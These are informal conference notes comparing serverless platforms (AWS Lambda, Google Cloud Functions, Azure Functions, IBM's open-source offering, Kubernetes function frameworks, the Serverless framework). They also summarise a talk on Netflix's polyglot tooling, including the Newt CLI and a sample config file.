Latency + Cold start

Providers

AWS
Azure
...

AWS - Lambda

Runtimes
- Node.js
- Java
- Python
- C#
Events
- ...
Monitoring + Logging
- Logs + Metrics pushed to CloudWatch
- ...
Debugging + Diagnostics
- X-Ray - Shows us the visual function calls in a graph
Local Development
- No Tool from AWS
- There is a project on github to do this
Ecosystem
- Step functions
  - Creating workflows - Can be described visually in the UI
  - Coordinate functions

Google Cloud Functions

Runtimes
- Node.js
Events
- HTTP request
- Cloud Pub/Sub
- ...
Monitoring + Logging
- Logs and Metrics pushed to Stackdriver Logging
- ...
Debugging + Diagnostics
- Debugging with Stackdriver Debugger
Local Development
- Cloud Functions Local Emulator
Ecosystem
- Cloud Functions for Firebase

Microsoft Azure

Runtimes
- Node
- C#
- ...
Events
- Http Requests
- Schedule
- Azure stuff
Monitoring + Logging
- Logs and metrics are pushed to Application Insight
- ...
Debugging + Diagnostics
- Debugging via local Visual Studio
Ecosystem
- Logic Apps

IBM - Open Source project

Runtimes
- Node.js
- Swift
- ...
- anything via Docker
Events
- HTTP Requests
- Github events
- ...

Functions on Kubernetes

Kubeless
Fission
Funktion

FaunaDB

DB
From the team that scales Twitter
global consistency
Pay for actual usage

Serverless (company)

Offers a CLI
A Framework
Serverless.yaml file
serverless deploy
- Different Providers

@mthenw

16:30 - 17:30 - The Rise of Polyglot at Netflix

polyglot - multiple languages

Nebula OSPackage - Turns Java app into an debian package

Newt - Netflix Workflow Toolkit

CLI in Golang
newt package
`newt setup``
.newt.yml

app-type: node-beta
build-step: newt exec npm run-script build
tool-versions:
  node: 6.9.1
  npm: 3.10.8

alias npm="newt exec npm --"

jahe/devopscon-2017-notes.md